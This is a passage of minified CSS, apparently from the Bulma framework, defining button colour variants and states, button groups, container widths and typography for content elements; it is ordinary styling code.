.button.is-white.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-white.is-inverted.is-outlined{background-color:transparent;border-color:#0a0a0a;color:#0a0a0a}.button.is-white.is-inverted.is-outlined:hover,.button.is-white.is-inverted.is-outlined.is-hovered,.button.is-white.is-inverted.is-outlined:focus,.button.is-white.is-inverted.is-outlined.is-focused{background-color:#0a0a0a;color:#fff}.button.is-white.is-inverted.is-outlined.is-loading:hover:after,.button.is-white.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-white.is-inverted.is-outlined.is-loading:focus:after,.button.is-white.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent white white!important}.button.is-white.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-white.is-inverted.is-outlined{background-color:transparent;border-color:#0a0a0a;box-shadow:none;color:#0a0a0a}.button.is-black{background-color:#0a0a0a;border-color:transparent;color:#fff}.button.is-black:hover,.button.is-black.is-hovered{background-color:#040404;border-color:transparent;color:#fff}.button.is-black:focus,.button.is-black.is-focused{border-color:transparent;color:#fff}.button.is-black:focus:not(:active),.button.is-black.is-focused:not(:active){box-shadow:0 0 0 .125em #0a0a0a40}.button.is-black:active,.button.is-black.is-active{background-color:#000;border-color:transparent;color:#fff}.button.is-black[disabled],fieldset[disabled] .button.is-black{background-color:#0a0a0a;border-color:#0a0a0a;box-shadow:none}.button.is-black.is-inverted{background-color:#fff;color:#0a0a0a}.button.is-black.is-inverted:hover,.button.is-black.is-inverted.is-hovered{background-color:#f2f2f2}.button.is-black.is-inverted[disabled],fieldset[disabled] .button.is-black.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#0a0a0a}.button.is-black.is-loading:after{border-color:transparent transparent white white!important}.button.is-black.is-outlined{background-color:transparent;border-color:#0a0a0a;color:#0a0a0a}.button.is-black.is-outlined:hover,.button.is-black.is-outlined.is-hovered,.button.is-black.is-outlined:focus,.button.is-black.is-outlined.is-focused{background-color:#0a0a0a;border-color:#0a0a0a;color:#fff}.button.is-black.is-outlined.is-loading:after{border-color:transparent transparent #0a0a0a #0a0a0a!important}.button.is-black.is-outlined.is-loading:hover:after,.button.is-black.is-outlined.is-loading.is-hovered:after,.button.is-black.is-outlined.is-loading:focus:after,.button.is-black.is-outlined.is-loading.is-focused:after{border-color:transparent transparent white white!important}.button.is-black.is-outlined[disabled],fieldset[disabled] .button.is-black.is-outlined{background-color:transparent;border-color:#0a0a0a;box-shadow:none;color:#0a0a0a}.button.is-black.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-black.is-inverted.is-outlined:hover,.button.is-black.is-inverted.is-outlined.is-hovered,.button.is-black.is-inverted.is-outlined:focus,.button.is-black.is-inverted.is-outlined.is-focused{background-color:#fff;color:#0a0a0a}.button.is-black.is-inverted.is-outlined.is-loading:hover:after,.button.is-black.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-black.is-inverted.is-outlined.is-loading:focus:after,.button.is-black.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #0a0a0a #0a0a0a!important}.button.is-black.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-black.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-light{background-color:#f5f5f5;border-color:transparent;color:#000000b3}.button.is-light:hover,.button.is-light.is-hovered{background-color:#eee;border-color:transparent;color:#000000b3}.button.is-light:focus,.button.is-light.is-focused{border-color:transparent;color:#000000b3}.button.is-light:focus:not(:active),.button.is-light.is-focused:not(:active){box-shadow:0 0 0 .125em #f5f5f540}.button.is-light:active,.button.is-light.is-active{background-color:#e8e8e8;border-color:transparent;color:#000000b3}.button.is-light[disabled],fieldset[disabled] .button.is-light{background-color:#f5f5f5;border-color:#f5f5f5;box-shadow:none}.button.is-light.is-inverted{background-color:#000000b3;color:#f5f5f5}.button.is-light.is-inverted:hover,.button.is-light.is-inverted.is-hovered{background-color:#000000b3}.button.is-light.is-inverted[disabled],fieldset[disabled] .button.is-light.is-inverted{background-color:#000000b3;border-color:transparent;box-shadow:none;color:#f5f5f5}.button.is-light.is-loading:after{border-color:transparent transparent rgba(0,0,0,.7) rgba(0,0,0,.7)!important}.button.is-light.is-outlined{background-color:transparent;border-color:#f5f5f5;color:#f5f5f5}.button.is-light.is-outlined:hover,.button.is-light.is-outlined.is-hovered,.button.is-light.is-outlined:focus,.button.is-light.is-outlined.is-focused{background-color:#f5f5f5;border-color:#f5f5f5;color:#000000b3}.button.is-light.is-outlined.is-loading:after{border-color:transparent transparent whitesmoke whitesmoke!important}.button.is-light.is-outlined.is-loading:hover:after,.button.is-light.is-outlined.is-loading.is-hovered:after,.button.is-light.is-outlined.is-loading:focus:after,.button.is-light.is-outlined.is-loading.is-focused:after{border-color:transparent transparent rgba(0,0,0,.7) rgba(0,0,0,.7)!important}.button.is-light.is-outlined[disabled],fieldset[disabled] .button.is-light.is-outlined{background-color:transparent;border-color:#f5f5f5;box-shadow:none;color:#f5f5f5}.button.is-light.is-inverted.is-outlined{background-color:transparent;border-color:#000000b3;color:#000000b3}.button.is-light.is-inverted.is-outlined:hover,.button.is-light.is-inverted.is-outlined.is-hovered,.button.is-light.is-inverted.is-outlined:focus,.button.is-light.is-inverted.is-outlined.is-focused{background-color:#000000b3;color:#f5f5f5}.button.is-light.is-inverted.is-outlined.is-loading:hover:after,.button.is-light.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-light.is-inverted.is-outlined.is-loading:focus:after,.button.is-light.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent whitesmoke whitesmoke!important}.button.is-light.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-light.is-inverted.is-outlined{background-color:transparent;border-color:#000000b3;box-shadow:none;color:#000000b3}.button.is-dark{background-color:#363636;border-color:transparent;color:#fff}.button.is-dark:hover,.button.is-dark.is-hovered{background-color:#2f2f2f;border-color:transparent;color:#fff}.button.is-dark:focus,.button.is-dark.is-focused{border-color:transparent;color:#fff}.button.is-dark:focus:not(:active),.button.is-dark.is-focused:not(:active){box-shadow:0 0 0 .125em #36363640}.button.is-dark:active,.button.is-dark.is-active{background-color:#292929;border-color:transparent;color:#fff}.button.is-dark[disabled],fieldset[disabled] .button.is-dark{background-color:#363636;border-color:#363636;box-shadow:none}.button.is-dark.is-inverted{background-color:#fff;color:#363636}.button.is-dark.is-inverted:hover,.button.is-dark.is-inverted.is-hovered{background-color:#f2f2f2}.button.is-dark.is-inverted[disabled],fieldset[disabled] .button.is-dark.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#363636}.button.is-dark.is-loading:after{border-color:transparent transparent #fff #fff!important}.button.is-dark.is-outlined{background-color:transparent;border-color:#363636;color:#363636}.button.is-dark.is-outlined:hover,.button.is-dark.is-outlined.is-hovered,.button.is-dark.is-outlined:focus,.button.is-dark.is-outlined.is-focused{background-color:#363636;border-color:#363636;color:#fff}.button.is-dark.is-outlined.is-loading:after{border-color:transparent transparent #363636 #363636!important}.button.is-dark.is-outlined.is-loading:hover:after,.button.is-dark.is-outlined.is-loading.is-hovered:after,.button.is-dark.is-outlined.is-loading:focus:after,.button.is-dark.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #fff #fff!important}.button.is-dark.is-outlined[disabled],fieldset[disabled] .button.is-dark.is-outlined{background-color:transparent;border-color:#363636;box-shadow:none;color:#363636}.button.is-dark.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-dark.is-inverted.is-outlined:hover,.button.is-dark.is-inverted.is-outlined.is-hovered,.button.is-dark.is-inverted.is-outlined:focus,.button.is-dark.is-inverted.is-outlined.is-focused{background-color:#fff;color:#363636}.button.is-dark.is-inverted.is-outlined.is-loading:hover:after,.button.is-dark.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-dark.is-inverted.is-outlined.is-loading:focus:after,.button.is-dark.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #363636 #363636!important}.button.is-dark.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-dark.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-primary{background-color:#00d1b2;border-color:transparent;color:#fff}.button.is-primary:hover,.button.is-primary.is-hovered{background-color:#00c4a7;border-color:transparent;color:#fff}.button.is-primary:focus,.button.is-primary.is-focused{border-color:transparent;color:#fff}.button.is-primary:focus:not(:active),.button.is-primary.is-focused:not(:active){box-shadow:0 0 0 .125em #00d1b240}.button.is-primary:active,.button.is-primary.is-active{background-color:#00b89c;border-color:transparent;color:#fff}.button.is-primary[disabled],fieldset[disabled] .button.is-primary{background-color:#00d1b2;border-color:#00d1b2;box-shadow:none}.button.is-primary.is-inverted{background-color:#fff;color:#00d1b2}.button.is-primary.is-inverted:hover,.button.is-primary.is-inverted.is-hovered{background-color:#f2f2f2}.button.is-primary.is-inverted[disabled],fieldset[disabled] .button.is-primary.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#00d1b2}.button.is-primary.is-loading:after{border-color:transparent transparent #fff #fff!important}.button.is-primary.is-outlined{background-color:transparent;border-color:#00d1b2;color:#00d1b2}.button.is-primary.is-outlined:hover,.button.is-primary.is-outlined.is-hovered,.button.is-primary.is-outlined:focus,.button.is-primary.is-outlined.is-focused{background-color:#00d1b2;border-color:#00d1b2;color:#fff}.button.is-primary.is-outlined.is-loading:after{border-color:transparent transparent #00d1b2 #00d1b2!important}.button.is-primary.is-outlined.is-loading:hover:after,.button.is-primary.is-outlined.is-loading.is-hovered:after,.button.is-primary.is-outlined.is-loading:focus:after,.button.is-primary.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #fff #fff!important}.button.is-primary.is-outlined[disabled],fieldset[disabled] .button.is-primary.is-outlined{background-color:transparent;border-color:#00d1b2;box-shadow:none;color:#00d1b2}.button.is-primary.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-primary.is-inverted.is-outlined:hover,.button.is-primary.is-inverted.is-outlined.is-hovered,.button.is-primary.is-inverted.is-outlined:focus,.button.is-primary.is-inverted.is-outlined.is-focused{background-color:#fff;color:#00d1b2}.button.is-primary.is-inverted.is-outlined.is-loading:hover:after,.button.is-primary.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-primary.is-inverted.is-outlined.is-loading:focus:after,.button.is-primary.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #00d1b2 #00d1b2!important}.button.is-primary.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-primary.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-primary.is-light{background-color:#ebfffc;color:#00947e}.button.is-primary.is-light:hover,.button.is-primary.is-light.is-hovered{background-color:#defffa;border-color:transparent;color:#00947e}.button.is-primary.is-light:active,.button.is-primary.is-light.is-active{background-color:#d1fff8;border-color:transparent;color:#00947e}.button.is-link{background-color:#485fc7;border-color:transparent;color:#fff}.button.is-link:hover,.button.is-link.is-hovered{background-color:#3e56c4;border-color:transparent;color:#fff}.button.is-link:focus,.button.is-link.is-focused{border-color:transparent;color:#fff}.button.is-link:focus:not(:active),.button.is-link.is-focused:not(:active){box-shadow:0 0 0 .125em #485fc740}.button.is-link:active,.button.is-link.is-active{background-color:#3a51bb;border-color:transparent;color:#fff}.button.is-link[disabled],fieldset[disabled] .button.is-link{background-color:#485fc7;border-color:#485fc7;box-shadow:none}.button.is-link.is-inverted{background-color:#fff;color:#485fc7}.button.is-link.is-inverted:hover,.button.is-link.is-inverted.is-hovered{background-color:#f2f2f2}.button.is-link.is-inverted[disabled],fieldset[disabled] .button.is-link.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#485fc7}.button.is-link.is-loading:after{border-color:transparent transparent #fff #fff!important}.button.is-link.is-outlined{background-color:transparent;border-color:#485fc7;color:#485fc7}.button.is-link.is-outlined:hover,.button.is-link.is-outlined.is-hovered,.button.is-link.is-outlined:focus,.button.is-link.is-outlined.is-focused{background-color:#485fc7;border-color:#485fc7;color:#fff}.button.is-link.is-outlined.is-loading:after{border-color:transparent transparent #485fc7 #485fc7!important}.button.is-link.is-outlined.is-loading:hover:after,.button.is-link.is-outlined.is-loading.is-hovered:after,.button.is-link.is-outlined.is-loading:focus:after,.button.is-link.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #fff #fff!important}.button.is-link.is-outlined[disabled],fieldset[disabled] .button.is-link.is-outlined{background-color:transparent;border-color:#485fc7;box-shadow:none;color:#485fc7}.button.is-link.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-link.is-inverted.is-outlined:hover,.button.is-link.is-inverted.is-outlined.is-hovered,.button.is-link.is-inverted.is-outlined:focus,.button.is-link.is-inverted.is-outlined.is-focused{background-color:#fff;color:#485fc7}.button.is-link.is-inverted.is-outlined.is-loading:hover:after,.button.is-link.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-link.is-inverted.is-outlined.is-loading:focus:after,.button.is-link.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #485fc7 #485fc7!important}.button.is-link.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-link.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-link.is-light{background-color:#eff1fa;color:#3850b7}.button.is-link.is-light:hover,.button.is-link.is-light.is-hovered{background-color:#e6e9f7;border-color:transparent;color:#3850b7}.button.is-link.is-light:active,.button.is-link.is-light.is-active{background-color:#dce0f4;border-color:transparent;color:#3850b7}.button.is-info{background-color:#3e8ed0;border-color:transparent;color:#fff}.button.is-info:hover,.button.is-info.is-hovered{background-color:#3488ce;border-color:transparent;color:#fff}.button.is-info:focus,.button.is-info.is-focused{border-color:transparent;color:#fff}.button.is-info:focus:not(:active),.button.is-info.is-focused:not(:active){box-shadow:0 0 0 .125em #3e8ed040}.button.is-info:active,.button.is-info.is-active{background-color:#3082c5;border-color:transparent;color:#fff}.button.is-info[disabled],fieldset[disabled] .button.is-info{background-color:#3e8ed0;border-color:#3e8ed0;box-shadow:none}.button.is-info.is-inverted{background-color:#fff;color:#3e8ed0}.button.is-info.is-inverted:hover,.button.is-info.is-inverted.is-hovered{background-color:#f2f2f2}.button.is-info.is-inverted[disabled],fieldset[disabled] .button.is-info.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#3e8ed0}.button.is-info.is-loading:after{border-color:transparent transparent #fff #fff!important}.button.is-info.is-outlined{background-color:transparent;border-color:#3e8ed0;color:#3e8ed0}.button.is-info.is-outlined:hover,.button.is-info.is-outlined.is-hovered,.button.is-info.is-outlined:focus,.button.is-info.is-outlined.is-focused{background-color:#3e8ed0;border-color:#3e8ed0;color:#fff}.button.is-info.is-outlined.is-loading:after{border-color:transparent transparent #3e8ed0 #3e8ed0!important}.button.is-info.is-outlined.is-loading:hover:after,.button.is-info.is-outlined.is-loading.is-hovered:after,.button.is-info.is-outlined.is-loading:focus:after,.button.is-info.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #fff #fff!important}.button.is-info.is-outlined[disabled],fieldset[disabled] .button.is-info.is-outlined{background-color:transparent;border-color:#3e8ed0;box-shadow:none;color:#3e8ed0}.button.is-info.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-info.is-inverted.is-outlined:hover,.button.is-info.is-inverted.is-outlined.is-hovered,.button.is-info.is-inverted.is-outlined:focus,.button.is-info.is-inverted.is-outlined.is-focused{background-color:#fff;color:#3e8ed0}.button.is-info.is-inverted.is-outlined.is-loading:hover:after,.button.is-info.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-info.is-inverted.is-outlined.is-loading:focus:after,.button.is-info.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #3e8ed0 #3e8ed0!important}.button.is-info.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-info.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-info.is-light{background-color:#eff5fb;color:#296fa8}.button.is-info.is-light:hover,.button.is-info.is-light.is-hovered{background-color:#e4eff9;border-color:transparent;color:#296fa8}.button.is-info.is-light:active,.button.is-info.is-light.is-active{background-color:#dae9f6;border-color:transparent;color:#296fa8}.button.is-success{background-color:#48c78e;border-color:transparent;color:#fff}.button.is-success:hover,.button.is-success.is-hovered{background-color:#3ec487;border-color:transparent;color:#fff}.button.is-success:focus,.button.is-success.is-focused{border-color:transparent;color:#fff}.button.is-success:focus:not(:active),.button.is-success.is-focused:not(:active){box-shadow:0 0 0 .125em #48c78e40}.button.is-success:active,.button.is-success.is-active{background-color:#3abb81;border-color:transparent;color:#fff}.button.is-success[disabled],fieldset[disabled] .button.is-success{background-color:#48c78e;border-color:#48c78e;box-shadow:none}.button.is-success.is-inverted{background-color:#fff;color:#48c78e}.button.is-success.is-inverted:hover,.button.is-success.is-inverted.is-hovered{background-color:#f2f2f2}.button.is-success.is-inverted[disabled],fieldset[disabled] .button.is-success.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#48c78e}.button.is-success.is-loading:after{border-color:transparent transparent #fff #fff!important}.button.is-success.is-outlined{background-color:transparent;border-color:#48c78e;color:#48c78e}.button.is-success.is-outlined:hover,.button.is-success.is-outlined.is-hovered,.button.is-success.is-outlined:focus,.button.is-success.is-outlined.is-focused{background-color:#48c78e;border-color:#48c78e;color:#fff}.button.is-success.is-outlined.is-loading:after{border-color:transparent transparent #48c78e #48c78e!important}.button.is-success.is-outlined.is-loading:hover:after,.button.is-success.is-outlined.is-loading.is-hovered:after,.button.is-success.is-outlined.is-loading:focus:after,.button.is-success.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #fff #fff!important}.button.is-success.is-outlined[disabled],fieldset[disabled] .button.is-success.is-outlined{background-color:transparent;border-color:#48c78e;box-shadow:none;color:#48c78e}.button.is-success.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-success.is-inverted.is-outlined:hover,.button.is-success.is-inverted.is-outlined.is-hovered,.button.is-success.is-inverted.is-outlined:focus,.button.is-success.is-inverted.is-outlined.is-focused{background-color:#fff;color:#48c78e}.button.is-success.is-inverted.is-outlined.is-loading:hover:after,.button.is-success.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-success.is-inverted.is-outlined.is-loading:focus:after,.button.is-success.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #48c78e #48c78e!important}.button.is-success.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-success.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-success.is-light{background-color:#effaf5;color:#257953}.button.is-success.is-light:hover,.button.is-success.is-light.is-hovered{background-color:#e6f7ef;border-color:transparent;color:#257953}.button.is-success.is-light:active,.button.is-success.is-light.is-active{background-color:#dcf4e9;border-color:transparent;color:#257953}.button.is-warning{background-color:#ffe08a;border-color:transparent;color:#000000b3}.button.is-warning:hover,.button.is-warning.is-hovered{background-color:#ffdc7d;border-color:transparent;color:#000000b3}.button.is-warning:focus,.button.is-warning.is-focused{border-color:transparent;color:#000000b3}.button.is-warning:focus:not(:active),.button.is-warning.is-focused:not(:active){box-shadow:0 0 0 .125em #ffe08a40}.button.is-warning:active,.button.is-warning.is-active{background-color:#ffd970;border-color:transparent;color:#000000b3}.button.is-warning[disabled],fieldset[disabled] .button.is-warning{background-color:#ffe08a;border-color:#ffe08a;box-shadow:none}.button.is-warning.is-inverted{background-color:#000000b3;color:#ffe08a}.button.is-warning.is-inverted:hover,.button.is-warning.is-inverted.is-hovered{background-color:#000000b3}.button.is-warning.is-inverted[disabled],fieldset[disabled] .button.is-warning.is-inverted{background-color:#000000b3;border-color:transparent;box-shadow:none;color:#ffe08a}.button.is-warning.is-loading:after{border-color:transparent transparent rgba(0,0,0,.7) rgba(0,0,0,.7)!important}.button.is-warning.is-outlined{background-color:transparent;border-color:#ffe08a;color:#ffe08a}.button.is-warning.is-outlined:hover,.button.is-warning.is-outlined.is-hovered,.button.is-warning.is-outlined:focus,.button.is-warning.is-outlined.is-focused{background-color:#ffe08a;border-color:#ffe08a;color:#000000b3}.button.is-warning.is-outlined.is-loading:after{border-color:transparent transparent #ffe08a #ffe08a!important}.button.is-warning.is-outlined.is-loading:hover:after,.button.is-warning.is-outlined.is-loading.is-hovered:after,.button.is-warning.is-outlined.is-loading:focus:after,.button.is-warning.is-outlined.is-loading.is-focused:after{border-color:transparent transparent rgba(0,0,0,.7) rgba(0,0,0,.7)!important}.button.is-warning.is-outlined[disabled],fieldset[disabled] .button.is-warning.is-outlined{background-color:transparent;border-color:#ffe08a;box-shadow:none;color:#ffe08a}.button.is-warning.is-inverted.is-outlined{background-color:transparent;border-color:#000000b3;color:#000000b3}.button.is-warning.is-inverted.is-outlined:hover,.button.is-warning.is-inverted.is-outlined.is-hovered,.button.is-warning.is-inverted.is-outlined:focus,.button.is-warning.is-inverted.is-outlined.is-focused{background-color:#000000b3;color:#ffe08a}.button.is-warning.is-inverted.is-outlined.is-loading:hover:after,.button.is-warning.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-warning.is-inverted.is-outlined.is-loading:focus:after,.button.is-warning.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #ffe08a #ffe08a!important}.button.is-warning.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-warning.is-inverted.is-outlined{background-color:transparent;border-color:#000000b3;box-shadow:none;color:#000000b3}.button.is-warning.is-light{background-color:#fffaeb;color:#946c00}.button.is-warning.is-light:hover,.button.is-warning.is-light.is-hovered{background-color:#fff6de;border-color:transparent;color:#946c00}.button.is-warning.is-light:active,.button.is-warning.is-light.is-active{background-color:#fff3d1;border-color:transparent;color:#946c00}.button.is-danger{background-color:#f14668;border-color:transparent;color:#fff}.button.is-danger:hover,.button.is-danger.is-hovered{background-color:#f03a5f;border-color:transparent;color:#fff}.button.is-danger:focus,.button.is-danger.is-focused{border-color:transparent;color:#fff}.button.is-danger:focus:not(:active),.button.is-danger.is-focused:not(:active){box-shadow:0 0 0 .125em #f1466840}.button.is-danger:active,.button.is-danger.is-active{background-color:#ef2e55;border-color:transparent;color:#fff}.button.is-danger[disabled],fieldset[disabled] .button.is-danger{background-color:#f14668;border-color:#f14668;box-shadow:none}.button.is-danger.is-inverted{background-color:#fff;color:#f14668}.button.is-danger.is-inverted:hover,.button.is-danger.is-inverted.is-hovered{background-color:#f2f2f2}.button.is-danger.is-inverted[disabled],fieldset[disabled] .button.is-danger.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#f14668}.button.is-danger.is-loading:after{border-color:transparent transparent #fff #fff!important}.button.is-danger.is-outlined{background-color:transparent;border-color:#f14668;color:#f14668}.button.is-danger.is-outlined:hover,.button.is-danger.is-outlined.is-hovered,.button.is-danger.is-outlined:focus,.button.is-danger.is-outlined.is-focused{background-color:#f14668;border-color:#f14668;color:#fff}.button.is-danger.is-outlined.is-loading:after{border-color:transparent transparent #f14668 #f14668!important}.button.is-danger.is-outlined.is-loading:hover:after,.button.is-danger.is-outlined.is-loading.is-hovered:after,.button.is-danger.is-outlined.is-loading:focus:after,.button.is-danger.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #fff #fff!important}.button.is-danger.is-outlined[disabled],fieldset[disabled] .button.is-danger.is-outlined{background-color:transparent;border-color:#f14668;box-shadow:none;color:#f14668}.button.is-danger.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-danger.is-inverted.is-outlined:hover,.button.is-danger.is-inverted.is-outlined.is-hovered,.button.is-danger.is-inverted.is-outlined:focus,.button.is-danger.is-inverted.is-outlined.is-focused{background-color:#fff;color:#f14668}.button.is-danger.is-inverted.is-outlined.is-loading:hover:after,.button.is-danger.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-danger.is-inverted.is-outlined.is-loading:focus:after,.button.is-danger.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #f14668 #f14668!important}.button.is-danger.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-danger.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-danger.is-light{background-color:#feecf0;color:#cc0f35}.button.is-danger.is-light:hover,.button.is-danger.is-light.is-hovered{background-color:#fde0e6;border-color:transparent;color:#cc0f35}.button.is-danger.is-light:active,.button.is-danger.is-light.is-active{background-color:#fcd4dc;border-color:transparent;color:#cc0f35}.button.is-small{font-size:.75rem}.button.is-small:not(.is-rounded){border-radius:2px}.button.is-normal{font-size:1rem}.button.is-medium{font-size:1.25rem}.button.is-large{font-size:1.5rem}.button[disabled],fieldset[disabled] .button{background-color:#fff;border-color:#dbdbdb;box-shadow:none;opacity:.5}.button.is-fullwidth{display:flex;width:100%}.button.is-loading{color:transparent!important;pointer-events:none}.button.is-loading:after{position:absolute;left:calc(50% - .5em);top:calc(50% - .5em);position:absolute!important}.button.is-static{background-color:#f5f5f5;border-color:#dbdbdb;color:#7a7a7a;box-shadow:none;pointer-events:none}.button.is-rounded{border-radius:9999px;padding-left:1.25em;padding-right:1.25em}.buttons{align-items:center;display:flex;flex-wrap:wrap;justify-content:flex-start}.buttons .button{margin-bottom:.5rem}.buttons .button:not(:last-child):not(.is-fullwidth){margin-right:.5rem}.buttons:last-child{margin-bottom:-.5rem}.buttons:not(:last-child){margin-bottom:1rem}.buttons.are-small .button:not(.is-normal):not(.is-medium):not(.is-large){font-size:.75rem}.buttons.are-small .button:not(.is-normal):not(.is-medium):not(.is-large):not(.is-rounded){border-radius:2px}.buttons.are-medium .button:not(.is-small):not(.is-normal):not(.is-large){font-size:1.25rem}.buttons.are-large .button:not(.is-small):not(.is-normal):not(.is-medium){font-size:1.5rem}.buttons.has-addons .button:not(:first-child){border-bottom-left-radius:0;border-top-left-radius:0}.buttons.has-addons .button:not(:last-child){border-bottom-right-radius:0;border-top-right-radius:0;margin-right:-1px}.buttons.has-addons .button:last-child{margin-right:0}.buttons.has-addons .button:hover,.buttons.has-addons .button.is-hovered{z-index:2}.buttons.has-addons .button:focus,.buttons.has-addons .button.is-focused,.buttons.has-addons .button:active,.buttons.has-addons .button.is-active,.buttons.has-addons .button.is-selected{z-index:3}.buttons.has-addons .button:focus:hover,.buttons.has-addons .button.is-focused:hover,.buttons.has-addons .button:active:hover,.buttons.has-addons .button.is-active:hover,.buttons.has-addons .button.is-selected:hover{z-index:4}.buttons.has-addons .button.is-expanded{flex-grow:1;flex-shrink:1}.buttons.is-centered{justify-content:center}.buttons.is-centered:not(.has-addons) .button:not(.is-fullwidth){margin-left:.25rem;margin-right:.25rem}.buttons.is-right{justify-content:flex-end}.buttons.is-right:not(.has-addons) .button:not(.is-fullwidth){margin-left:.25rem;margin-right:.25rem}@media screen and (max-width: 768px){.button.is-responsive.is-small{font-size:.5625rem}.button.is-responsive,.button.is-responsive.is-normal{font-size:.65625rem}.button.is-responsive.is-medium{font-size:.75rem}.button.is-responsive.is-large{font-size:1rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.button.is-responsive.is-small{font-size:.65625rem}.button.is-responsive,.button.is-responsive.is-normal{font-size:.75rem}.button.is-responsive.is-medium{font-size:1rem}.button.is-responsive.is-large{font-size:1.25rem}}.container{flex-grow:1;margin:0 auto;position:relative;width:auto}.container.is-fluid{max-width:none!important;padding-left:32px;padding-right:32px;width:100%}@media screen and (min-width: 1024px){.container{max-width:960px}}@media screen and (max-width: 1215px){.container.is-widescreen:not(.is-max-desktop){max-width:1152px}}@media screen and (max-width: 1407px){.container.is-fullhd:not(.is-max-desktop):not(.is-max-widescreen){max-width:1344px}}@media screen and (min-width: 1216px){.container:not(.is-max-desktop){max-width:1152px}}@media screen and (min-width: 1408px){.container:not(.is-max-desktop):not(.is-max-widescreen){max-width:1344px}}.content li+li{margin-top:.25em}.content p:not(:last-child),.content dl:not(:last-child),.content ol:not(:last-child),.content ul:not(:last-child),.content blockquote:not(:last-child),.content pre:not(:last-child),.content table:not(:last-child){margin-bottom:1em}.content h1,.content h2,.content h3,.content h4,.content h5,.content h6{color:#363636;font-weight:600;line-height:1.125}.content h1{font-size:2em;margin-bottom:.5em}.content h1:not(:first-child){margin-top:1em}.content h2{font-size:1.75em;margin-bottom:.5714em}.content h2:not(:first-child){margin-top:1.1428em}.content h3{font-size:1.5em;margin-bottom:.6666em}.content h3:not(:first-child){margin-top:1.3333em}.content h4{font-size:1.25em;margin-bottom:.8em}.content h5{font-size:1.125em;margin-bottom:.8888em}.content h6{font-size:1em;margin-bottom:1em}.content blockquote{background-color:#f5f5f5;border-left:5px solid #dbdbdb;padding:1.25em 1.5em}.content ol{list-style-position:outside;margin-left:2em;margin-top:1em}.content ol:not([type]){list-style-type:decimal}.content ol:not([type]).is-lower-alpha{list-style-type:lower-alpha}.content ol:not([type]).is-lower-roman{list-style-type:lower-roman}.content ol:not([type]).is-upper-alpha{list-style-type:upper-alpha}.content ol:not([type]).is-upper-roman{list-style-type:upper-roman}.content ul{list-style:disc outside;margin-left:2em;margin-top:1em}.content ul ul{list-style-type:circle;margin-top:.5em}.content ul ul ul{list-style-type:square}.content dd{margin-left:2em}.content figure{margin-left:2em;margin-right:2em;text-align:center}.content figure:not(:first-child){margin-top:2em}.content figure:not(:last-child){margin-bottom:2em}.content figure img{display:inline-block}.content figure figcaption{font-style:italic}.content pre{-webkit-overflow-scrolling:touch;overflow-x:auto;padding:1.25em 1.5em;white-space:pre;word-wrap:normal}.content sup,.content sub{font-size:75%}.content table{width:100%}.content table td,.content table th{border:1px solid #dbdbdb;border-width:0 0 1px;padding:.5em .75em;vertical-align:top}.content table th{color:#363636}.content table th:not([align]){text-align:inherit}.content table thead td,.content table thead 